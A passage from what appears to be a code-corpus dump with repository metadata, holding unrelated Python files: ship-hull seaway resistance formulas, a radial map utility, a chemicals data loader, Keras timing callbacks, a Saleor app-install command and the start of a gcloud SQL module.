warnings.warn('Vessel length/beam = {0:.3f}, outside of range of applicability (3 <= L/b <= 5). Results are extrapolations.'.format(P2), stacklevel=2)
if tau < 3 or tau > 7:
warnings.warn('Vessel trim = {0:.3f}, outside of range of applicability (3 deg <= tau <= 7 deg). Results are extrapolations.'.format(tau), stacklevel=2)
if beta < 10 or beta > 30:
warnings.warn('Vessel deadrise = {0:.3f}, outside of range of applicability (10 deg <= beta <= 30 deg). Results are extrapolations.'.format(beta), stacklevel=2)
if P5 < 0.2 or P5 > 0.7:
warnings.warn('Significant wave height / beam = {0:.3f}, outside of range of applicability (0.2 <= H_sig/b <= 0.7). Results are extrapolations.'.format(P5), stacklevel=2)
if P6 < 2 or P6 > 6:
warnings.warn('Speed coefficient = {0:.3f}, outside of range of applicability (2 <= Vk/sqrt(L) <= 6, with units knots/ft^0.5). Results are extrapolations.'.format(P6), stacklevel=2)
R_AW_2 = (w*b**3)*66*10**-6*(H_sig/b+0.5)*(L/b)**3/C_Delta+0.0043*(tau-4) #Added resistance at Vk/sqrt(L) = 2
R_AW_4 = (Delta)*(0.3*H_sig/b)/(1+2*H_sig/b)*(1.76-tau/6-2*np.tan(beta*pi/180)**3) #Vk/sqrt(L) = 4
R_AW_6 = (w*b**3)*(0.158*H_sig/b)/(1+(H_sig/b)*(0.12*beta-21*C_Delta*(5.6-L/b)+7.5*(6-L/b))) #Vk/sqrt(L) = 6
R_AWs = np.array([R_AW_2, R_AW_4, R_AW_6])
R_AWs_interp = interpolate.interp1d([2,4,6], R_AWs, kind='quadratic', fill_value='extrapolate')
R_AW = R_AWs_interp([Vk_L])[0]
elif self.seaway_drag_type == 2: #Fridsma '71 design charts
#Check that variables are inside range of applicability (P. R-1495 of Fridsma '71)
if C_Delta < 0.3 or C_Delta > 0.9:
warnings.warn('C_Delta = {0:.3f}, outside of range of applicability (0.3 <= C_Delta <= 0.9). Results are extrapolations'.format(C_Delta), stacklevel=2)
if L/b < 3 or L/b > 6:
warnings.warn('L/b = {0:.3f}, outside of range of applicability (3 <= L/b <= 6). Results are extrapolations'.format(L/b), stacklevel=2)
if C_Delta/(L/b) < 0.06 or C_Delta/(L/b) > 0.18:
warnings.warn('C_Delta/(L/b) = {0:.3f}, outside of range of applicability (0.06 <= C_Delta/(L/b) <= 0.18). Results are extrapolations'.format(C_Delta/(L/b)), stacklevel=2)
if tau < 3 or tau > 7:
warnings.warn('tau = {0:.3f}, outside of range of applicability (3 <= tau <= 7). Results are extrapolations'.format(tau), stacklevel=2)
if beta < 10 or beta > 30:
warnings.warn('beta = {0:.3f}, outside of range of applicability (10 <= beta <= 30). Results are extrapolations'.format(beta), stacklevel=2)
if H_sig/b > 0.8:
warnings.warn('H_sig/b = {0:.3f}, outside of range of applicability (H_sig/b <= 0.8). Results are extrapolations'.format(H_sig/b), stacklevel=2)
if Vk_L > 6:
warnings.warn('Vk_L = {0:.3f}, outside of range of applicability (Vk_L <= 6). Results are extrapolations'.format(Vk_L), stacklevel=2)
#Get data tables (required for when package is distributed)
Raw2_tab = pkg_resources.resource_filename(__name__, 'tables\Raw_0.2.csv')
Raw4_tab = pkg_resources.resource_filename(__name__, 'tables\Raw_0.4.csv')
Raw6_tab = pkg_resources.resource_filename(__name__, 'tables\Raw_0.6.csv')
V2_tab = pkg_resources.resource_filename(__name__, 'tables\V_0.2.csv')
V4_tab = pkg_resources.resource_filename(__name__, 'tables\V_0.4.csv')
RawV2_tab = pkg_resources.resource_filename(__name__, 'tables\Raw_V_0.2.csv')
RawV4_tab = pkg_resources.resource_filename(__name__, 'tables\Raw_V_0.4.csv')
RawV6_tab = pkg_resources.resource_filename(__name__, 'tables\Raw_V_0.6.csv')
#Read values from extracted chart points
arr_Raw2 = np.genfromtxt(Raw2_tab, delimiter=',', skip_header=1)
arr_Raw4 = np.genfromtxt(Raw4_tab, delimiter=',', skip_header=1)
arr_Raw6 = np.genfromtxt(Raw6_tab, delimiter=',', skip_header=1)
arr_V2 = np.genfromtxt(V2_tab, delimiter=',', skip_header=1)
arr_V4 = np.genfromtxt(V4_tab, delimiter=',', skip_header=1)
arr_Raw_V2 = np.genfromtxt(RawV2_tab, delimiter=',', skip_header=1)
arr_Raw_V4 = np.genfromtxt(RawV4_tab, delimiter=',', skip_header=1)
arr_Raw_V6 = np.genfromtxt(RawV6_tab, delimiter=',', skip_header=1)
#Create interpolation functions
interp1Type = 'linear'
interp2Type = 'linear'
Raw2m_interp = interpolate.interp2d(arr_Raw2[:, 1], arr_Raw2[:, 0], arr_Raw2[:, 2], kind=interp2Type)
Raw4m_interp = interpolate.interp2d(arr_Raw4[:, 1], arr_Raw4[:, 0], arr_Raw4[:, 2], kind=interp2Type)
Raw6m_interp = interpolate.interp2d(arr_Raw6[:, 1], arr_Raw6[:, 0], arr_Raw6[:, 2], kind=interp2Type)
V2m_interp = interpolate.interp2d(arr_V2[:, 1], arr_V2[:, 0], arr_V2[:, 2], kind=interp2Type)
V4m_interp = interpolate.interp2d(arr_V4[:, 1], arr_V4[:, 0], arr_V4[:, 2], kind=interp2Type)
V6m_interp = V4m_interp
RawRaw2m_interp = interpolate.interp1d(arr_Raw_V2[:, 0], arr_Raw_V2[:, 1], kind=interp1Type, fill_value='extrapolate')
RawRaw4m_interp = interpolate.interp1d(arr_Raw_V4[:, 0], arr_Raw_V4[:, 1], kind=interp1Type, fill_value='extrapolate')
RawRaw6m_interp = interpolate.interp1d(arr_Raw_V6[:, 0], arr_Raw_V6[:, 1], kind=interp1Type, fill_value='extrapolate')
#Get values following procedure shown in Fridsma 1971 paper
VLm = [V2m_interp(beta, tau)[0], V4m_interp(beta, tau)[0], V6m_interp(beta, tau)[0]]
Rwbm = [Raw2m_interp(beta, tau)[0], Raw4m_interp(beta, tau)[0], Raw6m_interp(beta, tau)[0]]
VVm = Vk_L/VLm
RRm = [RawRaw2m_interp(VVm[0]), RawRaw4m_interp(VVm[1]), RawRaw6m_interp(VVm[2])]
Rwb = np.multiply(RRm, Rwbm)
E1 = lambda H_sig: 1 + ((L/b)**2/25 - 1)/(1 + 0.895*(H_sig/b - 0.6)) #V/sqrt(L) = 2
E2 = lambda H_sig: 1 + 10*H_sig/b*(C_Delta/(L/b) - 0.12) #V/sqrt(L) = 4
E3 = lambda H_sig: 1 + 2*H_sig/b*(0.9*(C_Delta-0.6)-0.7*(C_Delta-0.6)**2) #V/sqrt(L) = 6
E_interp = lambda H_sig: interpolate.interp1d([2, 4, 6], [E1(H_sig), E2(H_sig), E3(H_sig)], kind=interp1Type, fill_value='extrapolate')
E = [E_interp(0.2*b)(Vk_L), E_interp(0.4*b)(Vk_L), E_interp(0.6*b)(Vk_L)]
Rwb_final = np.multiply(Rwb,E)
Rwb_final_interp = interpolate.interp1d([0.2, 0.4, 0.6], Rwb_final, kind=interp1Type, fill_value='extrapolate')
R_AW = Rwb_final_interp(H_sig/b)*w*b**3
warnings.warn('Average impact acceleration based on the Fridsma charts is currently not implemented. Using Savitsky & Brown approximation.', stacklevel=2)
n_cg = 0.0104*(H_sig/b+0.084)*tau/4*(5/3-beta/30)*(Vk_L)**2*L/b/C_Delta #g, at CG
n_bow = n_cg*(1+3.8*(L/b-2.25)/(Vk_L)) #g, at bow
avg_impact_acc = np.array([n_cg, n_bow])
#Update values
self.avg_impact_acc = avg_impact_acc
self.R_AW = R_AW*4.448 #lbf to N conversion
| 52.561809 | 312 | 0.569533 | 52,157 | 0.997285 | 0 | 0 | 0 | 0 | 0 | 0 | 25,361 | 0.484923 |
0dd86d6751b718e9a801f6c2b5674a1aa993cf90 | 959 | py | Python | curve2map.py | jmilou/image_utilities | 92399acf045b4f839afb105b0aa513a27fb31094 | [
"MIT"
] | null | null | null | curve2map.py | jmilou/image_utilities | 92399acf045b4f839afb105b0aa513a27fb31094 | [
"MIT"
] | null | null | null | curve2map.py | jmilou/image_utilities | 92399acf045b4f839afb105b0aa513a27fb31094 | [
"MIT"
] | 1 | 2018-01-08T19:24:32.000Z | 2018-01-08T19:24:32.000Z | # -*- coding: utf-8 -*-
"""
Created on Tue Oct 6 09:54:17 2015
@author: jmilli
"""
import numpy as np
from scipy.interpolate import interp1d
def create2dMap(values, inputRadii=None, maxRadius=None):
    """Build a 2D map from a 1D radial distribution.

    Parameters
    ----------
    values : array-like
        Radial profile values; non-finite entries are ignored for the fit.
    inputRadii : array-like, optional
        Radii at which `values` are defined. If None, uses 0..len(values)-1
        and sets maxRadius to len(values).
    maxRadius : float, optional
        Side length of the output map. Mandatory when inputRadii is given.

    Returns
    -------
    map2d : ndarray
        Square map obtained by cubic interpolation of the profile over the
        radial distance of each pixel (NaN outside the input radius range).
    distmap : ndarray
        Map of the radial distance of each pixel from the image center.
    """
    values = np.asarray(values)
    nbValues = len(values)
    # `is None` instead of `== None`: an elementwise array comparison against
    # None has an ambiguous truth value and raised ValueError for array inputs.
    if inputRadii is None:
        inputRadii = np.arange(0, nbValues)
        maxRadius = nbValues
    else:
        inputRadii = np.asarray(inputRadii)
        if maxRadius is None:
            raise ValueError('You must provide a maximum radius')
    imageAxis = np.arange(-maxRadius/2, maxRadius/2)
    x, y = np.meshgrid(imageAxis, imageAxis)
    distmap = abs(x + 1j*y)
    radiusOK = np.isfinite(values)
    # Cubic interpolation over the finite samples; pixels beyond the sampled
    # radii get NaN rather than an extrapolated value.
    func = interp1d(inputRadii[radiusOK], values[radiusOK], kind='cubic',
                    bounds_error=False, fill_value=np.nan)
    map2d = func(distmap)
    return map2d, distmap
| 29.96875 | 76 | 0.61731 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 251 | 0.261731 |
0dd886d9f601d6eaa6bdabd1f28a900d852bdcec | 543 | py | Python | lv1/hash_marathon.py | mrbartrns/programmers-algorithm | 7ecbb14c25f0cb69bec766fa4bc6b37b8cfadc47 | [
"MIT"
] | null | null | null | lv1/hash_marathon.py | mrbartrns/programmers-algorithm | 7ecbb14c25f0cb69bec766fa4bc6b37b8cfadc47 | [
"MIT"
] | null | null | null | lv1/hash_marathon.py | mrbartrns/programmers-algorithm | 7ecbb14c25f0cb69bec766fa4bc6b37b8cfadc47 | [
"MIT"
] | null | null | null | def solution(participant, completion):
answer = ''
# sort하면 시간절약이 가능
participant.sort() # [a, a, b]
completion.sort() # [a, b]
print(participant)
print(completion)
for i in range(len(completion)):
if participant[i] != completion[i]:
answer = participant[i]
break
else:
answer = participant[len(participant) - 1]
return answer
# Quick demo: prints the participant missing from the completion list.
demo_participants = ['marina', 'josipa', 'nikola', 'vinko', 'filipa']
demo_completions = ['josipa', 'filipa', 'marina', 'nikola']
print(solution(demo_participants, demo_completions))
0dd8a408a2e9a9ec0eac6d95ae185d9b08ee30c4 | 7,882 | py | Python | chemicals/data_reader.py | daar/chemicals | df3be046055055b99ae762e7a4b852a63134fc82 | [
"MIT"
] | null | null | null | chemicals/data_reader.py | daar/chemicals | df3be046055055b99ae762e7a4b852a63134fc82 | [
"MIT"
] | null | null | null | chemicals/data_reader.py | daar/chemicals | df3be046055055b99ae762e7a4b852a63134fc82 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Chemical Engineering Design Library (ChEDL). Utilities for process modeling.
Copyright (C) 2020 Caleb Bell <Caleb.Andrew.Bell@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
__all__ = ['df_sources',
           'data_source',
           'register_df_source',
           'load_df',
           'retrieve_any_from_df_dict',
           'retrieve_from_df_dict',
           'retrieve_any_from_df',
           'retrieve_from_df',
           'list_available_methods_from_df_dict',
           'list_available_methods_from_df']

import os
from math import isnan, nan

# os.path.join can be unavailable on stripped-down interpreters; in that case
# path_join stays undefined and the file-loading machinery cannot be used.
try:
    path_join = os.path.join
except: # pragma: no cover
    pass

# numpy is treated as optional here. The id()-based dtype sets below let
# make_df_sparse() test whether a column is a float column with a fast
# identity lookup instead of constructing dtype objects per column.
try:
    import numpy as np
    object_dtype = np.dtype(object)
    float64_dtype = np.dtype(np.float64)
    float32_dtype = np.dtype(np.float32)
    int64_dtype = np.dtype(np.int64)
    int32_dtype = np.dtype(np.int32)
    int16_dtype = np.dtype(np.int16)
    int8_dtype = np.dtype(np.int8)
    float_dtype_ids = set([id(float64_dtype), id(float32_dtype)])
    int_dtype_ids = set([id(int64_dtype), id(int32_dtype), id(int16_dtype), id(int8_dtype)])
except:
    pass

from chemicals.identifiers import CAS_to_int

# %% Loading data from local databanks

# pandas is imported lazily inside load_df(); `pd` stays None until then.
pd = None
# name -> loaded DataFrame cache, and name -> load parameters registry.
df_sources = {}
load_cmds = {}
def make_df_sparse(df, non_sparse_columns=()):
    '''Take a dataframe, and convert any floating-point columns which are mostly
    missing into sparse series. Return the resulting dataframe.

    Parameters
    ----------
    df : pandas.DataFrame
        Frame to compact; modified in place and also returned.
    non_sparse_columns : iterable of str, optional
        Column names that must never be converted. The default is an empty
        tuple (an immutable default replaces the original mutable `[]`,
        which is a classic shared-state hazard).
    '''
    sparse_float = pd.SparseDtype("float", nan)
    for col, dtype in zip(df.columns, df.dtypes):
        # Only float columns are candidates; identity lookup against the
        # module-level float dtype ids avoids per-column dtype construction.
        if col not in non_sparse_columns and id(dtype) in float_dtype_ids:
            series_orig = df[col]
            series_small = series_orig.astype(sparse_float)
            # Keep the sparse version only when it is genuinely smaller.
            if series_small.memory_usage() < series_orig.memory_usage():
                df[col] = series_small
    return df
def register_df_source(folder, name, sep='\t', index_col=0, csv_kwargs=None,
                       postload=None, sparsify=False, int_CAS=False):
    '''Register a lazily-loaded dataframe source under `name`.

    Nothing is read here; the parameters are simply recorded in `load_cmds`
    for load_df() to use on first access.

    The mutable-default `csv_kwargs={}` anti-pattern is replaced by a None
    sentinel; a fresh dict is stored so later mutation of a caller's dict
    cannot leak between registrations.
    '''
    if csv_kwargs is None:
        csv_kwargs = {}
    load_cmds[name] = (folder, name, sep, index_col, csv_kwargs, postload, sparsify, int_CAS)
'''The following flags will strip out the excess memory usage of redundant
chemical metadata information.
'''
# CHEDL_LOW_MEMORY=1 in the environment enables the low-memory mode consumed
# by load_df(); any unset or unparseable value falls back to the default (off).
try:
    low_mem = bool(int(os.environ.get('CHEDL_LOW_MEMORY', '0')))
except:
    low_mem = False
# Metadata columns considered redundant in low-memory mode. The variants with
# trailing spaces ('Name ', 'Formula ') presumably match headers exactly as
# they appear in some data files — confirm against the shipped databanks.
spurious_columns = set(['name', 'formula', 'MW', 'InChI', 'InChI_key', 'Chemical',
                        'Data Type', 'Uncertainty', 'Fluid', 'Name', 'Names', 'Name ',
                        'Formula', 'Formula '])
def load_df(key):
    """Load the dataframe registered under `key` into the module-level
    `df_sources` cache.

    Reads the CSV described by the registration tuple in `load_cmds`, then
    applies, in order: the optional `postload` hook, sparsification,
    low-memory column stripping, and integer CAS index conversion.
    """
    # pandas is imported lazily on first load to keep module import fast.
    global pd
    if pd is None:
        import pandas as pd
    folder, name, sep, index_col, csv_kwargs, postload, sparsify, int_CAS = load_cmds[key]
    path = path_join(folder, name)
    df = pd.read_csv(path, sep=sep, index_col=index_col, **csv_kwargs)
    # Per-source hook that may mutate the freshly loaded frame in place.
    if postload: postload(df)
    if sparsify:
        df = make_df_sparse(df)
    if low_mem:
        # Replace redundant metadata columns with empty sparse series: the
        # column name stays present but its memory is released.
        for col_name in df.columns.values.tolist():
            if col_name in spurious_columns:
                df[col_name] = pd.Series([], dtype=float).astype(pd.SparseDtype("float", nan))
    if int_CAS:
        '''Most CAS numbers fit in 32 bits. Not all of them do though, for
        example https://commonchemistry.cas.org/detail?cas_rn=2222298-66-8
        or 2627558-64-7
        The maximum value of an unsigned integer is 4294967295.
        It would be possible to remove the check digit of the CAS number,
        which would allow all 10-digit current CAS format integers to fit
        into an unsigned integer.
        https://www.cas.org/support/documentation/chemical-substances/faqs
        CAS says they are only "up to ten digits". However, before 2008 all
        CAS numbers were "up to nine digits"; and they are already 25% of the
        way through 10 digits. It is only a matter of time before they add
        another digit. At their current rate this will be in 2036, but it will
        likely be well before that. Therefore, it does not justify removing
        the check digit.
        '''
        # Store CAS numbers as int64 to cut index memory and speed lookups.
        df.index = pd.Index([CAS_to_int(s) for s in df.index], dtype=int64_dtype)
    df_sources[key] = df
def data_source(key):
    """Return the dataframe registered under `key`, loading it on first access."""
    if key not in df_sources:
        load_df(key)
    return df_sources[key]
# %% Retrieving data from files
def retrieve_from_df_dict(df_dict, index, key, method):
    """Select the dataframe for `method` from `df_dict` and retrieve the value
    under (`index`, `key`) from it.

    Raises ValueError for an unknown method name and TypeError when `method`
    is not a hashable string-like key.
    """
    try:
        df = df_dict[method]
    except KeyError:
        raise ValueError(
            f'Invalid method: {method}, allowed methods are {list(df_dict)}')
    except TypeError: # pragma: no cover
        raise TypeError(
            f"Method must be a string, not a {type(method).__name__} object")
    return retrieve_from_df(df, index, key)
def retrieve_any_from_df_dict(df_dict, index, key):
    """Return the first non-None value for (`index`, `key`) found across the
    dataframes in `df_dict` (in dict order); None when no frame has it."""
    candidates = (retrieve_from_df(df, index, key) for df in df_dict.values())
    return next((value for value in candidates if value is not None), None)
def retrieve_from_df(df, index, key):
    """Look up row `index` in `df` and return the value(s) under `key`.

    `key` may be a single column label (int or str), or an iterable of labels
    in which case a list of floats is returned. Returns None (implicitly)
    when `index` is not present in the frame.
    """
    df_index = df.index
    # Frames loaded with int_CAS=True carry integer CAS numbers in their
    # index; translate a CAS string so the lookup can succeed. The `is`
    # comparison against the cached int64 dtype mirrors the id()-based dtype
    # sets built at import time.
    if df_index.dtype is int64_dtype and isinstance(index, str):
        try: index = CAS_to_int(index)
        except: pass
    if index in df_index:
        if isinstance(key, (int, str)):
            return get_value_from_df(df, index, key)
        else: # Assume `key` is an iterable of column labels; values here are
              # coerced to float (non-numeric cells would raise).
            return [float(df.at[index, i]) for i in key]
def retrieve_any_from_df(df, index, keys):
    """Return the first non-missing value among columns `keys` for row
    `index`, as a float when possible; None when the row is absent or every
    value is NaN."""
    df_index = df.index
    # Translate a CAS string for integer-typed indexes (see retrieve_from_df).
    if df_index.dtype is int64_dtype and isinstance(index, str):
        try: index = CAS_to_int(index)
        except: pass
    if index not in df.index: return None
    for key in keys:
        value = df.at[index, key]
        # NOTE(review): isnan() raises TypeError on non-numeric cells; this
        # loop presumably only sees numeric columns — confirm with callers.
        if not isnan(value):
            try:
                return float(value)
            except: # pragma: no cover
                return value
def get_value_from_df(df, index, key):
    """Return df.at[index, key] as a float, None when it is NaN, or the raw
    value unchanged when it is not numeric (e.g. a string)."""
    value = df.at[index, key]
    try:
        if isnan(value):
            return None
    except TypeError:
        # Not a number
        return value
    return float(value)
def list_available_methods_from_df_dict(df_dict, index, key):
    """Return the names of the methods in `df_dict` whose dataframe holds a
    non-missing value in column `key` for row `index`."""
    methods = []
    # Lazily computed integer form of `index` for frames with int64 indexes.
    # None means "not attempted yet"; the sentinel string 'skip' records a
    # failed CAS conversion so it is attempted at most once.
    int_index = None
    for method, df in df_dict.items():
        df_index = df.index
        if df_index.dtype is int64_dtype and isinstance(index, str):
            if int_index is None:
                try:
                    int_index = CAS_to_int(index)
                except:
                    int_index = 'skip'
            elif int_index == 'skip':
                # Conversion already failed; an integer-indexed frame cannot
                # contain this string index.
                continue
            # NOTE(review): isnan() raises TypeError for non-numeric cells;
            # `key` is presumably a numeric column — confirm with callers.
            if (int_index in df_index) and not isnan(df.at[int_index, key]):
                methods.append(method)
        elif (index in df_index) and not isnan(df.at[index, key]):
            methods.append(method)
    return methods
def list_available_methods_from_df(df, index, keys_by_method):
    """Return the methods (keys of `keys_by_method`) whose mapped column holds
    a non-missing value for row `index` in `df`; [] when the row is absent.
    """
    if index not in df.index:
        return []
    # The module-level `pd` is None until load_df() first runs; import locally
    # so this function also works on caller-supplied dataframes before any
    # lazy load has happened (the original crashed with AttributeError then).
    import pandas as pd
    return [method for method, key in keys_by_method.items()
            if not pd.isnull(df.at[index, key])]
0dd931b7114a74c84466bdcc4e2ddf5aa167ed20 | 4,604 | py | Python | official/utils/misc/keras_utils.py | baranshad/models | aaf008855e9764f32d974e86f8e1f9cfddfafd9a | [
"Apache-2.0"
] | 180 | 2018-09-20T07:27:40.000Z | 2022-03-19T07:55:42.000Z | official/utils/misc/keras_utils.py | baranshad/models | aaf008855e9764f32d974e86f8e1f9cfddfafd9a | [
"Apache-2.0"
] | 80 | 2018-09-26T18:55:56.000Z | 2022-02-10T02:03:26.000Z | official/utils/misc/keras_utils.py | baranshad/models | aaf008855e9764f32d974e86f8e1f9cfddfafd9a | [
"Apache-2.0"
] | 72 | 2018-08-30T00:49:15.000Z | 2022-02-15T23:22:40.000Z | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Helper functions for the Keras implementations of models."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
import tensorflow as tf
from tensorflow.python.eager import profiler
class BatchTimestamp(object):
  """Record of when a given batch index was observed during training."""

  def __init__(self, batch_index, timestamp):
    self.batch_index = batch_index
    self.timestamp = timestamp

  def __repr__(self):
    return (f"'BatchTimestamp<batch_index: {self.batch_index}, "
            f"timestamp: {self.timestamp}>'")
class TimeHistory(tf.keras.callbacks.Callback):
  """Callback that logs examples/second every `log_steps` training batches."""
  def __init__(self, batch_size, log_steps):
    """Callback for logging performance (# examples/second).

    Args:
      batch_size: Total batch size.
      log_steps: Interval of time history logs.
    """
    self.batch_size = batch_size
    super(TimeHistory, self).__init__()
    self.log_steps = log_steps
    # Logs start of step 0 then end of each step based on log_steps interval.
    # List of BatchTimestamp marking window boundaries.
    self.timestamp_log = []
  def on_train_begin(self, logs=None):
    # record_batch gates start-of-window timing: when True, the next
    # on_batch_begin records a fresh start_time for the logging window.
    self.record_batch = True
  def on_train_end(self, logs=None):
    self.train_finish_time = time.time()
  def on_batch_begin(self, batch, logs=None):
    if self.record_batch:
      timestamp = time.time()
      self.start_time = timestamp
      self.record_batch = False
      if batch == 0:
        self.timestamp_log.append(BatchTimestamp(batch, timestamp))
  def on_batch_end(self, batch, logs=None):
    # Log once every log_steps batches (batch 0 only resets the window).
    if batch % self.log_steps == 0:
      timestamp = time.time()
      elapsed_time = timestamp - self.start_time
      # Average throughput over the window: log_steps batches of batch_size
      # examples each, divided by the time since the window's start.
      examples_per_second = (self.batch_size * self.log_steps) / elapsed_time
      if batch != 0:
        # Re-arm start-of-window timing for the next on_batch_begin.
        self.record_batch = True
        self.timestamp_log.append(BatchTimestamp(batch, timestamp))
        tf.compat.v1.logging.info(
            "BenchmarkMetric: {'num_batches':%d, 'time_taken': %f,"
            "'examples_per_second': %f}" %
            (batch, elapsed_time, examples_per_second))
def get_profiler_callback(model_dir, profile_steps, enable_tensorboard):
  """Validate profile_steps flag value and return profiler callback."""
  profile_steps_error_message = (
      'profile_steps must be a comma separated pair of positive integers, '
      'specifying the first and last steps to be profiled.'
  )
  # Parse "start,stop" into two ints; any malformed piece is a flag error.
  try:
    steps = [int(piece) for piece in profile_steps.split(',')]
  except ValueError:
    raise ValueError(profile_steps_error_message)
  if len(steps) != 2:
    raise ValueError(profile_steps_error_message)
  start_step, stop_step = steps
  # Range must be non-negative and ordered.
  if not 0 <= start_step <= stop_step:
    raise ValueError(profile_steps_error_message)
  if enable_tensorboard:
    tf.compat.v1.logging.warn(
        'Both TensorBoard and profiler callbacks are used. Note that the '
        'TensorBoard callback profiles the 2nd step (unless otherwise '
        'specified). Please make sure the steps profiled by the two callbacks '
        'do not overlap.')
  return ProfilerCallback(model_dir, start_step, stop_step)
class ProfilerCallback(tf.keras.callbacks.Callback):
  """Save profiles in specified step range to log directory."""

  def __init__(self, log_dir, start_step, stop_step):
    super(ProfilerCallback, self).__init__()
    self.log_dir = log_dir
    self.start_step = start_step
    self.stop_step = stop_step

  def on_batch_begin(self, batch, logs=None):
    # Start profiling exactly once, at the configured first step.
    if batch != self.start_step:
      return
    profiler.start()
    tf.compat.v1.logging.info('Profiler started at Step %s', self.start_step)

  def on_batch_end(self, batch, logs=None):
    # Stop at the configured last step and persist the collected profile.
    if batch != self.stop_step:
      return
    results = profiler.stop()
    profiler.save(self.log_dir, results)
    tf.compat.v1.logging.info(
        'Profiler saved profiles for steps between %s and %s to %s',
        self.start_step, self.stop_step, self.log_dir)
| 35.145038 | 80 | 0.701347 | 2,599 | 0.564509 | 0 | 0 | 0 | 0 | 0 | 0 | 1,740 | 0.377932 |
0ddaf186f436077344b9ec71e5a8e4c734247389 | 2,102 | py | Python | saleor/app/management/commands/install_app.py | greentornado/saleor | 7f58917957a23c4dd90b47214a4500c91c735dee | [
"CC-BY-4.0"
] | 3 | 2021-06-22T12:38:18.000Z | 2021-07-11T15:01:57.000Z | saleor/app/management/commands/install_app.py | greentornado/saleor | 7f58917957a23c4dd90b47214a4500c91c735dee | [
"CC-BY-4.0"
] | 111 | 2021-07-19T04:19:30.000Z | 2022-03-28T04:32:37.000Z | saleor/app/management/commands/install_app.py | aminziadna/saleor | 2e78fb5bcf8b83a6278af02551a104cfa555a1fb | [
"CC-BY-4.0"
] | 6 | 2021-11-08T16:43:05.000Z | 2022-03-22T17:31:16.000Z | import json
from typing import Any, Optional
import requests
from django.core.exceptions import ValidationError
from django.core.management import BaseCommand, CommandError
from django.core.management.base import CommandParser
from ....app.validators import AppURLValidator
from ....core import JobStatus
from ...installation_utils import install_app
from ...models import AppInstallation
from .utils import clean_permissions
class Command(BaseCommand):
    """Management command that installs a new app from a remote manifest URL."""

    help = "Used to install new app."

    def add_arguments(self, parser: CommandParser) -> None:
        parser.add_argument("manifest-url", help="Url with app manifest.", type=str)
        parser.add_argument(
            "--activate",
            action="store_true",
            dest="activate",
            help="Activates the app after installation",
        )

    def validate_manifest_url(self, manifest_url: str):
        """Raise CommandError when `manifest_url` is not a well-formed URL."""
        url_validator = AppURLValidator()
        try:
            url_validator(manifest_url)
        except ValidationError:
            raise CommandError(f"Incorrect format of manifest-url: {manifest_url}")

    def fetch_manifest_data(self, manifest_url: str) -> dict:
        """Download the manifest and return its decoded JSON body.

        Raises requests.HTTPError for non-2xx responses.
        """
        response = requests.get(manifest_url)
        response.raise_for_status()
        return response.json()

    def handle(self, *args: Any, **options: Any) -> Optional[str]:
        """Install the app described by the manifest; returns the auth token
        as a JSON string."""
        activate = options["activate"]
        manifest_url = options["manifest-url"]
        self.validate_manifest_url(manifest_url)
        manifest_data = self.fetch_manifest_data(manifest_url)
        permissions = clean_permissions(manifest_data.get("permissions", []))
        app_job = AppInstallation.objects.create(
            app_name=manifest_data["name"], manifest_url=manifest_url
        )
        if permissions:
            app_job.permissions.set(permissions)
        try:
            app = install_app(app_job, activate)
        except Exception:
            # Record the failure on the job before propagating. Bare `raise`
            # preserves the original traceback (the original `raise e` did not).
            app_job.status = JobStatus.FAILED
            app_job.save()
            raise
        token = app.tokens.first()
        return json.dumps({"auth_token": token.auth_token})
| 33.365079 | 84 | 0.670314 | 1,671 | 0.794957 | 0 | 0 | 0 | 0 | 0 | 0 | 242 | 0.115128 |
0ddb425d77d3e2f51449abccb667b4f56a4ea4c5 | 7,290 | py | Python | google-cloud-sdk/.install/.backup/lib/googlecloudsdk/api_lib/sql/operations.py | KaranToor/MA450 | c98b58aeb0994e011df960163541e9379ae7ea06 | [
"Apache-2.0"
] | 1 | 2017-11-29T18:52:27.000Z | 2017-11-29T18:52:27.000Z | google-cloud-sdk/.install/.backup/lib/googlecloudsdk/api_lib/sql/operations.py | KaranToor/MA450 | c98b58aeb0994e011df960163541e9379ae7ea06 | [
"Apache-2.0"
] | null | null | null | google-cloud-sdk/.install/.backup/lib/googlecloudsdk/api_lib/sql/operations.py | KaranToor/MA450 | c98b58aeb0994e011df960163541e9379ae7ea06 | [
"Apache-2.0"
] | 1 | 2020-07-25T12:09:01.000Z | 2020-07-25T12:09:01.000Z | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common utility functions for sql operations."""
import time
from apitools.base.py import exceptions
from googlecloudsdk.api_lib.sql import errors
from googlecloudsdk.core.console import progress_tracker as console_progress_tracker
from googlecloudsdk.core.util import retry
class _BaseOperations(object):
